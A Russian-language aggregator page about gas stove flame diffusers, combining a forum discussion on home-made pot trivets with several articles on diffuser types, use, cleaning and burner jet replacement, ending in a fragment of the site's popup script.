378 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Газовый рассекатель своими руками

Из чего сделать накладку-рассекатель для газовой плиты ?

На плите достаточно большое расстояние между прутьями решетки — узкие емкости падают на сами конфортки. Раньше была какая-то черная железка, которая лежала на краях прутьев и на нее можно было ставить посуду; но она потерялась. Из чего сделать или подобрать замену ? Просто жесть от консервных банок быстро прогорает.

SergeyE написал :
Из чего сделать или подобрать замену ?

Из 2-х мм стали. Она штампованная была — с загнутыми ребрышками.

SergeyE написал :
подобрать замену

Решетка для гриля

Делал из 5 мм. стали. Круг с просверленными отверстиями. Можно купить на барахолке что-то подобное или на рынке- где торгуют плитами.

Ну, и т. д.

а если нужен другой размер ?

SergeyE написал :
а если нужен другой размер

самому изготовить вообще не проблема, я себе сделал из 1,5мм обычной стали, с загнутыми краями. В ходу уже лет 5, и пока прогорать не собирается, а прогорит сделаю такую же, может даже из нержи, а может и опять из черняшки.

SergeyE написал :
а если нужен другой размер ?

У Вас нестандартная плита? Тогда да, только самодел. А готовые годятся для любых крестообразных решёток.

А у нас дома в виде круглого такого блина с дырками. Причем блин не плоский, а рельефный и типа двухслойный. Подойдет для любой формы решетки. Жена покупала в обычном хозмаге.. Могу сфотать, если интересно.

Это рассекатель, он уменьшает мощность пламени и служит для более равномерного его распределения. Это тоже полезная штука, но для других целей.

Ну, ТС и спрашивал про

Профан27 написал :
Ну, ТС и спрашивал про накладку-рассекатель

SergeyE написал :
На плите достаточно большое расстояние между прутьями решетки — узкие емкости падают на сами конфортки.

То есть уменьшать мощность пламени не требуется, а требуется что-то подставить под мелкую посуду. Те рассекатели, о которых говорите Вы, не годятся для мелкой посуды, она будет слишком долго на них нагреваться. Они поэтому и делаются такими большими, чтобы под большой сковородой/кастрюлей был равномерный нагрев, по всему дну. А крестообразные наоборот, для мелкой посуды, чтоб не падала. Поэтому по-хорошему нужно и то, и другое, если родная решётка у плиты неудачная. У меня, например, решётка так устроена, что хоть игрушечную кастрюльку ставь — не провалится. Поэтому эти крестовины не нужны. А вот большой блин-рассекатель в принципе не помешал бы для посуды большого диаметра.

Ну насчет «уменьшения мощности» вопрос скользкий. Закон Ломоносова-Лавуазье никто не отменял, и в его свете не видно, куда же это девается излишняя мощность? Если газ горит, как горел, то сколько ему положено гигаклорий отдать — он отдает, никакого уменьшения мощности не происходит, если кран на плите не крутить. Распределение этой мощности в пространстве — да, меняется.
И поставить на мой рассекатель мелкую посуду никто и ничто не мешает. По крайней мере мне, когда я на него турочку маленькую ставлю.

А достоинство моего рассекателя одно: он не дефицитный, его искать не надо, он в хозмаге продается, и на любую плиту подходит.

Профан27 написал :
Ну насчет «уменьшения мощности» вопрос скользкий. Закон Ломоносова-Лавуазье никто не отменял, и в его свете не видно, куда же это девается излишняя мощность? Если газ горит, как горел, то сколько ему положено гигаклорий отдать — он отдает, никакого уменьшения мощности не происходит, если кран на плите не крутить. Распределение этой мощности в пространстве — да, меняется.

Конечно, речь идёт о перераспределении. Хотя по идее температура верхнего слоя «блина» должна быть ниже, чем нижнего, то есть часть энергии уходит на нагревание железки, ни с чем не соприкасающейся, и двухслойность этого рассекателя не случайна — могли же просто железку с дырками сделать, плоскую. Но спорить не буду — увязну

Профан27 написал :
А достоинство моего рассекателя одно: он не дефицитный, его искать не надо, он в хозмаге продается, и на любую плиту подходит.

Странно, а мне как раз крестообразные накладки всюду попадались, а вот такой рассекатель давно уже не видела. Ассортимент хозмагов непредсказуем

Какой рассекатель для газовой плиты выбрать и как его использовать

Рассекатель пламени для газовой плиты – важный аксессуар, адаптирующий конфорку под посуду из материалов, не устойчивых к огню, или с дном меньшего диаметра.

В этой публикации:

Устройство и виды рассекателей огня

Для производства рассеивателей пламени газовой плиты используют металлы, не боящиеся длительного контакта с огнем. Чаще всего встречаются приспособления из стали – углеродистой или нержавеющей. Темные стальные круги боятся контакта с водой, ржавеют и быстро становятся непривлекательными. Рассекатели из нержавейки более практичны и долговечны.

Однако срок эксплуатации рассекателя зависит от качества металла, толщины листа и мастерства производителя. Более долговечны изделия с минеральным волокном. Металл не должен прогибаться и гнуться, особенно для тяжелой посуды.

В магазинах можно купить рассекатели для газовых плит разных видов:

  • Из двух пластин: нижняя является опорной, а верхняя – регулировочной. В обеих предусмотрены отверстия для распределения пламени. Внутри между пластинами образуется горячий воздух. Воздушная прослойка защищает от пригорания.
  • Двойные с перфорацией или сеткой с одной стороны. Сторона с отверстиями или сеткой – нижняя, ее ставят на конфорку. Лицевая часть в этом случае может быть ровной или с волнами, исходящими от центра круга. Это дополнительно приподнимает посуду и способствует правильному распределению тепла.
  • Сетчатые – похожи на приспособления для защиты от брызг жира во время жарки (используются вместо крышки), но здесь более прочная и плотная сетка.
  • С большим отверстием по центру. Так как пламя газовой плиты горит не в центре, а по краям конфорки, это отверстие не пропускает огонь, но зато увеличивается поток жара по центру. Такая конструкция подходит для некоторых блюд.

По форме пламярассеиватели бывают не только круглыми. Для маленьких конфорок можно приобрести небольшую квадратную решетку. Чаще всего такие выбирают для приготовления кофе в турке вместо редукторов и растапливания в кружках шоколада, масла, сыра.

Круги нужно выбирать по диаметру конфорки и посуды. Как правило, диаметр составляет от 20 до 30 см. Если окружность окажется больше дна, ничего страшного. Для больших кастрюль лучше отдать предпочтение плоскому кругу, чтобы не прогибался.

Для удобства использования рассекатели огня для стеклянной и керамической посуды дополняют съемными или несъемными ручками. Ручки бывают металлическими или с рукоятками из ненагревающихся материалов – дерева или пластика.

Назначение и применение рассекателя

Рассекатель для плиты – незаменимый помощник на кухне, берущий на себя контакт с пламенем и изолирующий от огня дно посуды. Приспособление берет на себя удар жара и огня, создавая кастрюлям и сковородкам идеальные условия.

Назначение рассекателя огня:

  • Изолирование от огня посуды, изготовленной из материалов, которые не выдерживают контакт с пламенем. Например, жаропрочные стеклянные кастрюли, фарфоровые чайники, сотейники из керамики, жаровни из глины.
  • Защита дна сковород и кастрюль, не предназначенных для газовых плит. Сюда можно отнести посуду с нежной эмалью, которая легко теряет привлекательность от воздействия огня, а также дно для индукционных плит (может потемнеть).
  • Адаптация конфорки под емкости с маленьким диаметром, например, кофеварку-турку, кофейник, порционную сковороду или маленькую кастрюлю. В итоге получается устойчивая конфорка, на которой ничего не перевернется, а ручки посудины не перегреются.

  • Распределение жара и обеспечение равномерного нагрева. При приготовлении в посуде тонким дном рассеиватель предупреждает пригорание блюда и приставание продуктов, особенно при длительном тушении и томлении, а также при варке каш, выпечке блинов, жарке котлет.
  • Приготовление на конфорке без посуды. Некоторые хозяйки запекают на пламярассекателях болгарские перцы и баклажаны, как на гриле. Но для таких задач лучше иметь отдельное приспособление с дырочками. Также можно запекать и разогревать, завернув продукты в фольгу.

Некоторые хозяйки используют перфорированные рассекатели пламени для стерилизации банок – ставят их на кипящие кастрюли вместо крышек, а сверху устанавливают банки кверху дном. Более смелые стерилизуют прямо на круге, но этот способ подходит только если нет перфорации.

Обзор разных видов пламярассеивателей

Рассекатель пламени из нержавеющей стали с деревянной ручкой марки WEBBER изготовлен в Китае. Аксессуар привлекает ценой (в районе 150 рублей) и идеально подходит для тех, кто планирует нечасто пользоваться им по назначению.

Рассекатель Metaltex изготовлен из нержавейки с минеральным волокном. Конструкция обеспечивает равномерное распределение жара по дну и препятствует пригоранию. Идеален для приготовления каш, муссов, киселей. Можно использовать как подставку под горячее.

Большой круглый рассекатель для стеклянных кастрюль и керамических жаровен от китайского производителя стоит в пределах 100 рублей. Радиальные углубления ускоряют процесс приготовления и дополнительно способствуют защите дна, сокращая контакт с раскаленным металлом.

Рассекатель огня итальянского производства изготовлен из прочной нержавеющей стали. Нижняя часть сетчатая, верхняя пластина рельефная. Ручка стальная. За ручку удобно быстро снимать приспособление с плиты. Подходит для сковород с большим диаметром.

Как правильно пользоваться

Поставив на газовую конфорку новый пламярассекатель, не пугайтесь, почувствовав неприятный запах и легкий дымок. Это обгорает заводская смазка. Чтобы избавиться от смазки, поместите круг на тихий огонь и прокалите, чтобы защитное покрытие обгорело.

Пользоваться рассекателем пламени для газовой плиты нужно правильно. Не стоит делать газ на всю, погружая круг в сильный огонь. Расположите приспособление на конфорке и зажгите газ на среднюю или тихую мощность. Делать сильное пламя нельзя, нужного эффекта не будет, а кастрюля из стекла или керамики может треснуть.

Ручка служит для снятия с плиты пустого рассекателя. Ни в коем случае не пытайтесь поднять его вместе с кастрюлей. Исключением может быть только что-то очень легкое.

Периодически рассеиватель нужно чистить, особенно тщательная чистка требуется, если запекали перцы или баклажаны прямо на пламярасссекателе без фольги. Лучше иметь несколько приспособлений для готовки и переходника.

Особенности рассекателя для газовой плиты

Рассекатель для газовой плиты используют с целью улучшения работы горелок: он разделяет поток газа на небольшие участки-огоньки для быстрого и равномерного разогрева посуды. Сверху эта деталь прикрывается металлической крышечкой в виде пластины.

Назначение

Основной его задачей является защита посуды от открытого огня. Это не только продлевает срок службы кухонной утвари, но и позволяет готовить значительно быстрее. Внешне рассекатель пламени напоминает круг с множеством небольших отверстий.

При выборе рассекателя лучше остановиться на модели из нержавеющей стали. Существуют также металлические варианты, но они быстро портятся и теряют свои рабочие качества.

Эта, на первый взгляд, незначительная деталь играет важную роль:

  1. Ручки кухонной посуды остаются холодными.
  2. Только благодаря наличию рассекателя, на плиту можно ставить стеклянную или керамическую посуду.
  3. Является своеобразной подставкой, которая не дает посуде опрокинуться и залить газ.
  4. Блюда готовятся быстро и равномерно.
  5. Защищает посуду от пригорания.
  6. Дает возможность использовать тару с небольшим дном.
  7. Так как конструкция рассекателя предусматривает сохранение тепла, приготовленные блюда могут «доходить» на выключенной плите.
  8. Позволяет регулировать режимы горения.

Что такое жиклер

Эта необходимая деталь представляет собой небольшой болт с отверстием. С его помощью газ поступает в конфорку и соединяется с воздухом, в результате чего и образуется пламя. Что же еще необходимо знать о жиклере?

  1. Газ из баллона или газопровода требует установки разных жиклеров. Если решили перейти с баллона на стационарный газ, то менять плиту не обязательно. Достаточно просто заменить эту небольшую деталь.
  2. Неправильная установка жиклера чревата опасными последствиями. Самое меньшее – это испорченная техника, самое большее – взрыв. Поэтому его установку и ремонт необходимо доверять только профессионалам.
  3. Если сменив магистральный газ на баллонный, вы забудете заменить жиклер, газ из него будет идти большой струей, что тоже может вызвать врыв.
  4. Если вы хотите произвести замену самостоятельно, внимательно изучите приложенную к жиклеру инструкцию с подробным описанием процесса.

От величины отверстия жиклера зависит рабочая мощность горелки. Цифровые значения обычно прописываются на торце детали.

Замена рассекателя

Без этой детали плита не сможет работать корректно, хотя последствия от испортившегося рассекателя не так страшны, как от плохого жиклера. Для замены детали необходимо знать следующее.

  1. Рассекатели бывают разной формы, но чаще всего встречаются круглые.
  2. Для каждой модели плиты подходит свой рассекатель. Использовать деталь от Индезит на плите Бош не рекомендуется.
  3. Чтобы облегчить покупателям выбор, производители ставят на детали специальные маркировки.

Как правило, неродные рассекатели могут просто не подойти по размеру или форме, но если вы ухитритесь запихнуть деталь, к примеру, от Индезит в Бош, то это может привести к поломке всей плиты, и тогда понадобится ее ремонт.

Рассекатель для газовой плиты Indesit и Ariston D 85 032226

Крышка рассекателя

Это завершающая деталь газовой конфорки, которая выглядит как круг с опущенными краями. Она используется для распределения газового потока в стороны. Обладает съемным механизмом, что облегчает чистку рассекателя и конфорки.

При выборе материала лучше остановиться на нержавейке. Несмотря на то, что черный металл не уступает в долговечности, он быстро теряет внешний вид и легко пачкается.

Устройство детали

Заводские детали выпускаются из двух составляющих: верхней и нижней пластины. Верхняя служит для регулировки, а нижняя – для опоры. Каждая пластина оснащена отверстиями, через которые и выходит пламя. Процесс работы выглядит так:

  1. На нижний диск устанавливается регулировочный.
  2. Обе детали помещаются на решетку плиты.
  3. Далее включается газ на минимальную мощность.
  4. При повороте рукоятки отверстия в рассекателе могут открываться и закрываться, тем самым регулируя поток пламени.
  5. Небольшая воздушная подушка позволяет защитить посуду от воздействия газа.

Рассекатель для газовой плиты можно изготовить своими руками, вырезав лист из 2-х миллиметровой стали с мелкими отверстиями. Однако насколько хорош он будет в эксплуатации – вопрос открытый.

Чистка

Если ваш рассеиватель засорился, его необходимо прочистить. Засоры приводят к некачественной работе плиты и недопеканию продуктов:

  1. Снимите конфорки.
  2. Рассоедините все элементы.
  3. Возьмите тонкий металлический прут и очистите отверстия от загрязнения.
  4. Сделайте раствор моющего средства и поместите в него детали примерно на час.
  5. При помощи губки очистите остальной мусор.
  6. Возьмите зубную щетку и прочистите все каналы.
  7. Ополосните детали под теплой водой.
  8. Просушите и произведите сбор в обратном порядке.

Чтобы не повредить детали, не следует использовать металлические губки, щетки или скребки.

Чаще всего мы и не замечаем важность такой детали, как рассекатель. А между тем он выполняет множество важных функций – регулирует пламя из конфорки плиты, сберегает посуду, позволяет равномерно готовить блюда.

Рассекатели для газовых плит: особенности и назначение

Наличие бытовой техники в квартире – залог комфортной жизни и удобства приготовления пищи. Современные производители выпускают огромное количество домашних устройств, без которых уже сложно представить быт человека. Уже многие десятки лет наибольшим спросом пользуются газовые плиты, которые с успехом заменили каменные печи и даже электрические плитки. Для быстрого приготовления еды в любой посуде производители разработали специальные рассекатели для газовых плит.

Устройство

Пламярассекатель – незаменимое устройство, которое создает наиболее комфортные условия для приготовления пищи. Основная задача рассекателя для газовой плиты – равномерное рассеивание большого потока пламени.

Материал изготовления – углеродистая сталь, нержавеющий металл. Устройства из углеродистой стали имеют короткий срок эксплуатации и подвержены коррозии при контакте с водой. Нержавеющие пламярассекатели более устойчивы к негативному воздействию внешних факторов и имеют длительный период эксплуатации.

На период эксплуатации бытовых рассекателей оказывают влияние следующие факторы:

  • качество металлического листа;
  • толщина материала;
  • способ изготовления;
  • наличие минеральных волокон.

Назначение рассеивателя пламени

Рассеиватели пламени уже многие годы являются востребованными и популярными устройствами, которые выполняют следующие функции:

  • защита фарфоровой, керамической и глиняной посуды от разрушительного влияния огня;
  • увеличение эффективности использования газа;
  • препятствие нагреванию ручек посуды;
  • создание идеальных условий для жарки и тушения;
  • регулировка потока подаваемого тепла;
  • длительное сохранение тепла после отключения газа;
  • возможность использовать эмалированную посуду на индукционных поверхностях плит;
  • сохранение привлекательного внешнего вида посуды;
  • приспособление больших конфорок под емкости, которые имеют небольшой диаметр дна;
  • увеличение устойчивости любого вида емкостей;
  • равномерное распределение тепловых потоков;
  • предупреждение подгорания и приставания еды ко дну емкости с небольшой толщиной дна;
  • возможность запекать овощи как на гриле;
  • самостоятельное разогревание еды, завернутой в фольгу;
  • стерилизация стеклянных банок.

Данный прибор нужен не только для решения бытовых задач, но и промышленных.

Специалисты выделяют три вида рассеивателя пламени:

Жиклер – неотъемлемая часть газовой плиты, которая имеет форму болта с отверстиями разной величины и выполняет функцию подачи газа в конфорку. Мощность плиты зависит от диаметра отверстий на поверхности жиклера. Для природного и баллонного газа надо устанавливать специальные жиклеры. Игнорирование данного правила приведет к появлению копоти и гари, а также может вызвать взрыв горючего вещества.

На рабочей поверхности всех газовых плит установлены специальные рассекатели, которые имеют разную форму и диаметр. Наиболее распространенными являются устройства круглой формы и зубчатые. Производитель самостоятельно выбирает тип рассекателя для выпускаемых моделей газовой техники.

При замене устройства надо учитывает его код и модель плиты. Изделия другой марки могут не просто не подойти, но и спровоцировать возникновение серьезных поломок прибора.

Съемный рассекатель – накладная крышка, которая имеет форму металлического диска с закругленными краями. Основная особенность – возможность разделения дисков для удаления различных загрязнений.

На полках специализированных магазинов можно увидеть несколько видов съемных устройств для газовых плит.

  • Двупластинчатые – простой прибор, который состоит из нижней опорной пластины и верхней регулировочной. Обе пластины имеют функцию распределения огня благодаря специальным отверстиям. Воздух, находящийся между пластинами, препятствует пригоранию устройства.
  • Двусторонние с перфорированной сеткой на одной стороне – усовершенствованный прибор, который имеет отверстия только на нижней стороне. Верхняя часть может быть полностью ровной или иметь волнистые выемки. Данная конструкция равномерно распределяет тепловую энергию и увеличивает расстояние между огнем и посудой.
  • Сетчатые – прибор, поверхность которого состоит из мелкой сетки.
  • С центральным отверстием – уникальная разработка, центральное отверстие которой не пропускает пламя, а увеличивает количество тепла в центре.

Производители выпускают рассекатели двух форм:

Выбор размера устройства зависит от диаметра конфорки и емкости для приготовления еды. Данный показатель находится в диапазоне от 200 мм до 300 мм. Нежелательно приобретать рассекатель меньшего диаметра, чем дно кастрюли.

Для емкостей с большим объемом надо выбирать прочные устройства, которые не подвержены прогибанию и механическим деформациям. Многие приборы дополнены специальными металлическими ручками, которые бывают стационарными или съемными. Наличие на ручке специальной ненагревающейся накладки предотвратит появление термических ожогов.

Как пользоваться?

Эксплуатация съемного рассеивателя пламени не вызовет сложностей даже у начинающих хозяек. Перед использованием нового прибора его надо прокалить на небольшом пламени в течение нескольких минут. Данная манипуляция даст возможность удалить заводскую смазку и предупредить распространение неприятного запаха во время приготовления еды.

Установку устройства надо осуществлять только на выключенную конфорку. Наилучший уровень используемого огня – маленький и средний. Сильное пламя может испортить не только рассекатель, но и поверхность кастрюли.

Запрещается снимать емкости с плиты с помощью ручки данного устройства, которая легко может деформироваться. Для изменения потока пламени и диаметра отверстий во время приготовления еды надо осторожно вращать ручку верхней пластины.

Продлить срок эксплуатации газового оборудования поможет соблюдение простых правил:

  • регулярно удалять с поверхности варочной панели остатки пищи и различный мусор;
  • не оставлять без присмотра бытовую технику во время ее эксплуатации;
  • своевременно осуществлять смазку комплектующих деталей;
  • проводить ремонт при первых признаках поломки.

Замена

При возникновении необходимости ремонта газовой плиты или замены ее комплектующих деталей надо обязательно обратиться к специалистам, которые быстро и качественно выполнят все необходимые работы. Устранить небольшие неполадки можно и самостоятельно. Для выполнения данной манипуляции надо внимательно изучить инструкцию прибора, а также желательно иметь необходимый объем профессиональных навыков и комплект специальных инструментов.

Замена жиклера – наиболее сложная работа, которую стоит доверить специалисту. Установку нового устройства надо осуществлять, если происходит замена способа поступления газа или его поломки.

В случае обнаружения неисправности в работе одной из форсунок, специалисты рекомендуют провести полную замену всех жиклеров газовой плиты. Полный набор форсунок, соответствующий модели печки, можно приобрести в специализированных магазинах.

Перечень необходимых инструментов:

  • крестовая отвертка;
  • рожковые отвертки;
  • набор накидных ключей – для жиклера, для гайки конфорок, наконечник для духовки.

Процесс замены жиклеров на варочной панели состоит из следующих этапов:

  • демонтаж решетки;
  • удаление рассекателей и конфорок из гнезд;
  • откручивание болтов конфорочной панели и ее демонтаж;
  • визуальный осмотр траверса, сопла и жиклера;
  • сжатие фиксатора для освобождения наконечника;
  • отсоединение жиклера от кольца крепления;
  • установка нового устройства.

Обязательное условие качественного монтажа – наличие на трубе уплотнительного кольца. Уплотнение резьбы форсунки и смазывания кольца проводится только по необходимости.

Заменить форсунку в духовом шкафу можно выполнив следующие манипуляции:

  • открытие нижнего технического ящика;
  • демонтаж пола духовки;
  • откручивание винтов горелки;
  • визуальный осмотр форсунки, которая расположена с левой стороны;
  • демонтаж левой крышки основного корпуса плиты;
  • снятие корпуса сопла;
  • установка нового устройства.

В случае если форсунка сильно прикипела к трубе, надо ее смазать специальным составом и только через несколько минут приступать к ее демонтажу. Категорически запрещается применять физическую силу, которая может привести к деформации комплектующих деталей и срыву резьбы. При покупке новых рассекателей для замены старых надо внимательно смотреть на точное соответствие их размеров и моделей.

Чистка

В процессе длительной эксплуатации газовой печки может произойти засорение форсунки моющими средствами, остатками пищи и продуктами горения. Восстановить подачу газа можно без привлечения опытных специалистов. Для самостоятельного решения проблемы надо проткнуть отверстия жиклера тонкой деревянной палочкой. Убедившись в том, что все отверстия очищены, необходимо вернуть на место снятый рассекатель. Перед выполнением работ по очистке газового оборудования надо обязательно перекрыть подачу газа и убедиться, что данные манипуляции не нанесут вред здоровью.

Для улучшения подачи газа в духовом шкафу в большинстве случаев надо провести только продувку и прочистку жиклера. Для удаления жира и нагара с рассекателей надо снять их с плиты и вымыть в большом количестве теплой воды с моющим средством. Опытные хозяйки рекомендуют использовать не только готовые чистящие химические составы, но и альтернативные способы удаления загрязнений.

Наиболее популярными подручными средствами являются следующие вещества:

  • хозяйственное мыло;
  • лимонная кислота;
  • уксус;
  • раствор аммиака;
  • пищевая сода.

Данные средства не только помогут быстро и легко удалить остатки жира и нагар, но и значительно уменьшат расходы семейного бюджета, а в случае их попадания на продукты питания, кожный покров или в пищевые емкости не вызовут аллергическую реакцию и отравление.

Категорически запрещается использовать железные мочалки и ершики, которые могут повредить металлическую поверхность и оставить на ней глубокие царапины. Наиболее подходящими средствами для удаления грязи являются зубная щетка, губка для мытья посуды и ватные палочки. При наличии застарелых и глубоких загрязнений надо предварительно замочить приборы в горячей воде с нашатырным спиртом и уксусом.

Производители бытовой техники изготавливают огромное количество приборов, которые значительно упрощают процесс ведения домашнего хозяйства. Приготовление пищи является не только творческим процессом, но и трудоемким, который требует умения, опыта и внимания. Уже многие годы незаменимой частью газовой плиты является рассекатель, который помогает оптимизировать тепловой поток и облегчить процесс создания кулинарных шедевров. Для продления эксплуатационного периода данного прибора надо не только приобретать качественные устройства, но и осуществлять его своевременный ремонт и чистку.

При возникновении серьезных неполадок опытные хозяйки рекомендуют обратиться к специалистам газового хозяйства.

Особенности рассекателя для газовой плиты

Рассекатель для газовой плиты используют с целью улучшения работы горелок: он разделяет поток газа на небольшие участки-огоньки для быстрого и равномерного разогрева посуды. Сверху эта деталь прикрывается металлической крышечкой в виде пластины.

Назначение

Основной его задачей является защита посуды от открытого огня. Это не только продлевает срок службы кухонной утвари, но и позволяет готовить значительно быстрее. Внешне рассекатель пламени напоминает круг с множеством небольших отверстий.

При выборе рассекателя лучше остановиться на модели из нержавеющей стали. Существуют также металлические варианты, но они быстро портятся и теряют свои рабочие качества.

Эта, на первый взгляд, незначительная деталь играет важную роль:

  1. Ручки кухонной посуды остаются холодными.
  2. Только благодаря наличию рассекателя, на плиту можно ставить стеклянную или керамическую посуду.
  3. Является своеобразной подставкой, которая не дает посуде опрокинуться и залить газ.
  4. Блюда готовятся быстро и равномерно.
  5. Защищает посуду от пригорания.
  6. Дает возможность использовать тару с небольшим дном.
  7. Так как конструкция рассекателя предусматривает сохранение тепла, приготовленные блюда могут «доходить» на выключенной плите.
  8. Позволяет регулировать режимы горения.

Что такое жиклер

Эта необходимая деталь представляет собой небольшой болт с отверстием. С его помощью газ поступает в конфорку и соединяется с воздухом, в результате чего и образуется пламя. Что же еще необходимо знать о жиклере?

  1. Газ из баллона или газопровода требует установки разных жиклеров. Если решили перейти с баллона на стационарный газ, то менять плиту не обязательно. Достаточно просто заменить эту небольшую деталь.
  2. Неправильная установка жиклера чревата опасными последствиями. Самое меньшее – это испорченная техника, самое большее – взрыв. Поэтому его установку и ремонт необходимо доверять только профессионалам.
  3. Если сменив магистральный газ на баллонный, вы забудете заменить жиклер, газ из него будет идти большой струей, что тоже может вызвать врыв.
  4. Если вы хотите произвести замену самостоятельно, внимательно изучите приложенную к жиклеру инструкцию с подробным описанием процесса.

От величины отверстия жиклера зависит рабочая мощность горелки. Цифровые значения обычно прописываются на торце детали.

Замена рассекателя

Без этой детали плита не сможет работать корректно, хотя последствия от испортившегося рассекателя не так страшны, как от плохого жиклера. Для замены детали необходимо знать следующее.

  1. Рассекатели бывают разной формы, но чаще всего встречаются круглые.
  2. Для каждой модели плиты подходит свой рассекатель. Использовать деталь от Индезит на плите Бош не рекомендуется.
  3. Чтобы облегчить покупателям выбор, производители ставят на детали специальные маркировки.

Как правило, неродные рассекатели могут просто не подойти по размеру или форме, но если вы ухитритесь запихнуть деталь, к примеру, от Индезит в Бош, то это может привести к поломке всей плиты, и тогда понадобится ее ремонт.

Рассекатель для газовой плиты Indesit и Ariston D 85 032226

Крышка рассекателя

Это завершающая деталь газовой конфорки, которая выглядит как круг с опущенными краями. Она используется для распределения газового потока в стороны. Обладает съемным механизмом, что облегчает чистку рассекателя и конфорки.

При выборе материала лучше остановиться на нержавейке. Несмотря на то, что черный металл не уступает в долговечности, он быстро теряет внешний вид и легко пачкается.

Устройство детали

Заводские детали выпускаются из двух составляющих: верхней и нижней пластины. Верхняя служит для регулировки, а нижняя – для опоры. Каждая пластина оснащена отверстиями, через которые и выходит пламя. Процесс работы выглядит так:

  1. На нижний диск устанавливается регулировочный.
  2. Обе детали помещаются на решетку плиты.
  3. Далее включается газ на минимальную мощность.
  4. При повороте рукоятки отверстия в рассекателе могут открываться и закрываться, тем самым регулируя поток пламени.
  5. Небольшая воздушная подушка позволяет защитить посуду от воздействия газа.

Рассекатель для газовой плиты можно изготовить своими руками, вырезав лист из 2-х миллиметровой стали с мелкими отверстиями. Однако насколько хорош он будет в эксплуатации – вопрос открытый.

Чистка

Если ваш рассеиватель засорился, его необходимо прочистить. Засоры приводят к некачественной работе плиты и недопеканию продуктов:

  1. Снимите конфорки.
  2. Рассоедините все элементы.
  3. Возьмите тонкий металлический прут и очистите отверстия от загрязнения.
  4. Сделайте раствор моющего средства и поместите в него детали примерно на час.
  5. При помощи губки очистите остальной мусор.
  6. Возьмите зубную щетку и прочистите все каналы.
  7. Ополосните детали под теплой водой.
  8. Просушите и произведите сбор в обратном порядке.

Чтобы не повредить детали, не следует использовать металлические губки, щетки или скребки.

Чаще всего мы и не замечаем важность такой детали, как рассекатель. А между тем он выполняет множество важных функций – регулирует пламя из конфорки плиты, сберегает посуду, позволяет равномерно готовить блюда.

Рассекатель горелки для газовых плит — назначение

В 1825 году скромный работник газовой фабрики Джеймс Шарп спроектировал первую газовую плиту. Созданное устройство он оставил дома, передав его в распоряжение жены. Спустя 11 лет, в 1836 году, первая фабрика в Англии запустила массовое производство газовых плит. Однако продукция не сразу стала пользоваться популярностью из-за медленной газификации и дороговизны природного газа.

Современная газовая плита, радуя своих хозяев экономичностью и многофункциональностью, стала неотъемлемой частью многих кухонь. Техника проста в применении, но для более удобного пользования придумали специальное приспособление – рассекатель. Узнаем, что такое рассекатель для газовой плиты и как им правильно пользоваться.

Устройство и виды рассекателей огня

Рассекатель пламени для газовой плиты – приспособление, которое адаптирует конфорку под разные емкости, защищает посуду от соприкосновения с открытым огнем и равномерно распределяет пламя во время приготовления пищи.

Приспособление имеет вид металлической однослойной или двухслойной пластины круглой либо квадратной формы. По всей площади пластины расположены маленькие отверстия. Изготавливают прибор из углеродистой или нержавеющей стали.

Справка. Рассекатели из нержавеющей стали более практичны и долговечны, в то время как приспособления из темной стали быстро теряют свой первоначальный вид, покрываются ржавчиной.

Различают несколько разновидностей пламярассекателей для газовых плит:

  1. Двухпластинчатые. Конструкция предусматривает две пластины с маленькими отверстиями: верхнюю – для опоры, нижнюю – для регулировки пламени. Внутри между платинами образуется горячий воздух, который защищает от пригорания.
  2. Двусторонниес перфорированной сеткой на одной стороне. Устройство также состоит из двух пластин. Верхняя пластина полностью ровная или имеет небольшие волнистые углубления, а нижняя – с небольшими отверстиями. Такая конструкция равномерно распределяет тепло и увеличивает расстояние между посудой и открытым огнем.
  3. Сетчатые. Однопластинчатый прибор, поверхность которого полностью выполнена из мелкой, прочной сетки.
  4. С отверстием по центру. Специальное отверстие на рассекателе не пропускает огонь, а направляет поток жара к центру.
  5. Крышка-отражатель – устройство, предусмотренное комплектацией газовой плиты. Круглая ровная крышка черного цвета накрывает горелку. Внутренняя поверхность отражает газовоздушную смесь, а после равномерно распределяет пламя на каналы горелки.

Для более удобного применения рассекатели снабжают съемными либо несъемными ручками, которые бывают или полностью металлическими, или с рукоятками из ненагревающихся материалов, например, дерева.

Назначение и применение рассекателя

Рассекатель для плиты – востребованное и популярное устройство, выполняющее сразу несколько функций:

  • изоляция от огня глиняной, керамической, фарфоровой и другой посуды, не выдерживающей разрушительного воздействия пламени;
  • повышение эффективности использования бытового газа;
  • равномерное распределение жара и тепловых потоков, что обеспечивает оптимальный прогрев посуды;
  • приспособление горелок под емкости с небольшим дном (кофейники, турки), что повышает их устойчивость;
  • длительное сохранение тепла после выключения газа;
  • регулирование интенсивности потоков тепла;
  • препятствование подгоранию и прилипанию пищи во время приготовления, особенно при длительном тушении, томлении;
  • сохранение привлекательного внешнего вида посуды;
  • предупреждение нагревания ручек емкостей;
  • возможность запекать овощи на гриле (перцы, баклажаны) без использования посуды (для этого лучше запастись отдельным приспособлением);
  • разогревание пищи, предварительно завернутой в фольгу.

Некоторые пользователи приноровились стерилизовать банки для солений при помощи рассекателя. Для этого на кастрюлю с кипящей водой вместо крышки кладут рассекатель, а сверху устанавливают банку на горлышко.

Обзор разных видов пламярассеивателей

В таблице представлены виды рассекателей для газовой плиты от разных производителей и их краткая характеристика.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
